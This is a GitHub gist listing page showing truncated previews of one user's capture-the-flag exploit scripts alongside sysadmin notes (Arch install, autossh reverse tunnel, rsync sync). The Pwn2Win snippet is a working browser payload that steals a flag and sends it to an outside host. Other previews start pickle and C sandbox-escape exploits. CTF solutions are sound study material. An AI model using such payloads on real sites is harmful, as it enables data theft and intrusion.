Skip to content

Instantly share code, notes, and snippets.

@icchy
icchy / x.py
Created October 11, 2020 06:30
SECCON CTF 2020 - WAFthrough
from urllib.request import urlopen
from urllib import request
import string
def escape(val):
return '''
$'\\\\{}'
'''[1:-1].format(val)
@icchy
icchy / poc.html
Last active April 27, 2021 18:57
TSGCTF Note (both 1 and 2)
<!doctype html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<iframe name=f width=100 height=100></iframe>
<script>
@icchy
icchy / q.html
Last active April 26, 2023 22:01
Pwn2Win 2020 matrona v2
<iframe id="ifr0" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe>
<iframe id="ifr1" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe>
<script>
window.addEventListener('hashchange', (evt) => {
const flag = evt.newURL.match(/CTF-BR\{.*\}/)[0]
fetch(`//tool.tonkatsu.info/?flag=${encodeURIComponent(flag)}`)
})
</script>
@icchy
icchy / solve.py
Created October 7, 2019 06:38
Balsn CTF 2019 pyshv1
import pickle
import io
whitelist = ['sys']
# See https://docs.python.org/3.7/library/pickle.html#restricting-globals
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
print(module)
@icchy
icchy / exp.c
Created September 2, 2019 00:30
Oneline Calc
123;
return 123;
}
extern void *opendir(const char *);
extern void *readdir(void *);
extern void *shmat(int, const void *, int);
typedef struct {
ino_t d_ino;
off_t d_off;
unsigned short d_reclen;
@icchy
icchy / server.go
Created August 7, 2019 15:56
Antivirus Oracle demo server
package main
import (
"bytes"
"crypto/rand"
"crypto/sha256"
"encoding/gob"
"fmt"
"io/ioutil"
"log"
@icchy
icchy / install.md
Last active November 27, 2018 02:07
ArchLinux installation memo

partitioning (GPT, EFI)

  • /boot 200MB fat32 (EFI System)
    • mkfs.fat -F32 /dev/sdX1
  • / rest xfs (Linux filesystem)
    • mkfs.xfs /dev/sdX2
    • xfs_admin -L "arch_os" /dev/sdX2 # label partition

install base system

mkdir -p /mnt/boot
@icchy
icchy / autossh.service
Last active January 30, 2018 02:03
persistent reverse port forward with systemd
[Unit]
Description = SSH daemon for rescure
After = network.target
[Service]
ExecStart = /usr/bin/ssh \
-N \
-o "ExitOnForwardFailure=yes" \
-o "StrictHostKeyChecking=no" \
-o "UserKnownHostsFile=/dev/null" \
@icchy
icchy / sync.sh
Last active January 30, 2018 10:37
rsync with fswatch
#!/bin/sh
remote_dir=host:path/to/remote/dir
local_dir=path/to/local/dir
usage () {
echo "usage: $0 [pull|push|sync]" >&2
}
check () {

Keybase proof

I hereby claim:

  • I am icchy on github.
  • I am icchy (https://keybase.io/icchy) on keybase.
  • I have a public key ASBwarXZmL7KF-RQSjS7SklMWOI0P1w5L7t-fsMNwpDW-Qo

To claim this, I am signing this object: